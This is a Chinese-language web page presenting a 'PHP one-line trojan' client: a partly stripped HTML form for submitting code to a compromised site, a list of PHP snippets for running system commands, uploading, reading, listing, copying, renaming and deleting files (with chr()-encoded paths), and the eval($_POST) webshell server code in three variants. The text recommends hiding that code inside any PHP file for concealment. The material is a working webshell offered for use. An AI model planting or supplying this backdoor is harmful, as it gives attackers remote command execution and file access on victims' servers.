PHP一句话木马客户端

2021-07-29 发布在网络安全0

☆PHP微型木马客户端☆

提交网址:

style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"

size=66 value=http:// name=act>

Cmd:

style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"

size=16 value=1 name=para>

发送执行的主代码:

上传文件时需要此项：

常用执行代码及代码说明

</div>
<div>
	//////////////////////////////////PHP环境变量//////////////////////////////</div>
<div>
	 </div>
<div>
	phpinfo();</div>
<div>
	 </div>
<div>
	//////////////////////////////////程序目录/////////////////////////////////</div>
<div>
	 </div>
<div>
	echo dirname(__FILE__); 或 echo __FILE__;</div>
<div>
	 </div>
<div>
	//////////////////////////////////执行CMD//////////////////////////////////</div>
<div>
	 </div>
<div>
	system(dir);  passthru(dir); //其他的自己可以模仿写</div>
<div>
	 </div>
<div>
	//////////////////////////////////上传文件/////////////////////////////////</div>
<div>
	 </div>
<div>
	echo copy($_FILES[LanKerF][tmp_name],$_FILES[LanKerF][name]);</div>
<div>
	 </div>
<div>
	//////////////////////////////////读取文件/////////////////////////////////</div>
<div>
	 </div>
<div>
	// $filename为文件名，需要绝对目录，而且在magic_quotes_gpc = on时需要转换字符</div>
<div>
	$filename= chr(73).chr(58).chr(92).chr(119).chr(119).chr(119).chr(114).chr(111).chr(111).chr(116).chr(92).chr(112).chr(104).chr(112).chr(116).chr(101).chr(115).chr(116).chr(92).chr(117).chr(112).chr(46).chr(112).chr(104).chr(112);</div>
<div>
	//$filename="i:wwwrootphptestup.htm"</div>
<div>
	$s=chr(60).chr(112).chr(114).chr(101).chr(62);</div>
<div>
	$e=chr(60).chr(47).chr(112).chr(114).chr(101).chr(62);</div>
<div>
	$fp=@fopen($filename,r);</div>
<div>
	$contents=@fread($fp, filesize($filename));</div>
<div>
	@fclose($fp);</div>
<div>
	$contents=htmlspecialchars($contents);</div>
<div>
	echo $s.$contents.$e;</div>
<div>
	 </div>
<div>
	//////////////////////////////////读取目录//////////////////////////////////</div>
<div>
	 </div>
<div>
	//$dir 为目录名，需要绝对目录，而且在magic_quotes_gpc = on时需要转换字符</div>
<div>
	$dir=chr(73).chr(58).chr(92).chr(119).chr(119).chr(119).chr(114).chr(111).chr(111).chr(116).chr(92).chr(112).chr(104).chr(112).chr(116).chr(101).chr(115).chr(116);</div>
<div>
	//$dir="c:/"</div>
<div>
	$f = chr(60).chr(98).chr(114).chr(62);//分隔符</div>
<div>
	$dir=@dir($dir);</div>
<div>
	if($dir) </div>
<div>
	{</div>
<div>
	  echo path_______.$dir->path.$f;</div>
<div>
	  while($entry=$dir->read())</div>
<div>
	{</div>
<div>
	 echo ____.$entry.$f; </div>
<div>
	  }</div>
<div>
	  $dir->close();</div>
<div>
	}</div>
<div>
	else</div>
<div>
	{echo 0;}</div>
<div>
	 </div>
<div>
	//////////////////////////////////复制文件///////////////////////////////</div>
<div>
	 </div>
<div>
	// 同上，当magic_quotes_gpc = on时，变量$a,$b需要字符转换。</div>
<div>
	//可以根据需要是否采用容错处理，成功时返回1</div>
<div>
	$a="i:/wwwroot/lanker/lk.txt";  //要复制的源文件</div>
<div>
	$b="i:/wwwroot/lanker.txt";   //复制后的文件路径及文件名</div>
<div>
	echo @copy($a,$b); </div>
<div>
	 </div>
<div>
	//////////////////////////////////重命名文件//////////////////////////////</div>
<div>
	 </div>
<div>
	$a="i:/wwwroot/lk.txt";     //要改名的文件</div>
<div>
	$b="i:/wwwroot/lanker.txt"; //改名后的文件</div>
<div>
	echo @rename($a,$b);</div>
<div>
	 </div>
<div>
	//////////////////////////////////删除文件////////////////////////////////</div>
<div>
	 </div>
<div>
	$a="i:/wwwroot/lanker.txt";  //要删除的文件</div>
<div>
	echo @unlink($a);</div>
<div>
	 </div>
<div>
	//////////////////////////////////////////////////////////////////////////</div>
<div>

字符转换工具
要转换的字符：
转换后的字符：
(当php.ini中的magic_quotes_gpc = on时，必须进行字符转换)

PHP微型后门服务端代码为:<?php eval($_POST[1]);?>

PHP微型后门服务端容错代码为:<?php @eval($_POST[1]);?>

PHP微型后门服务端超简型代码为:<?eval($1);?>

说明: 可以把服务端代码插入任意一PHP文件之中,隐蔽行比较好.但由于PHP语言本身的限制,特别是 magic_quotes_gpc = on 的时候限制,实现的功能也就大打折扣.但还好这个木马实现的一般功能已经基本上够用了.

如果您的问题还未解决可以联系站长付费协助。加入我们

有问题可以加入技术QQ群一起交流学习
本站vip会员请加入无忧模板网 VIP群（50604020） PS:加入时备注用户名或昵称
普通注册会员或访客请加入无忧模板网技术交流群（50604130）
客服微信号：15898888535
声明：本站所有文章资源内容，如无特殊说明或标注，均为采集网络资源。如若内容侵犯了原著者的合法权益，可联系站长删除。

木马 activ head html none ffffff hover text PhP 客户端

PHP一句话木马客户端

相关文章

热门

应用市场

热门标签

PHP一句话木马客户端

相关文章

热门

应用市场

热门标签

微信扫一扫打赏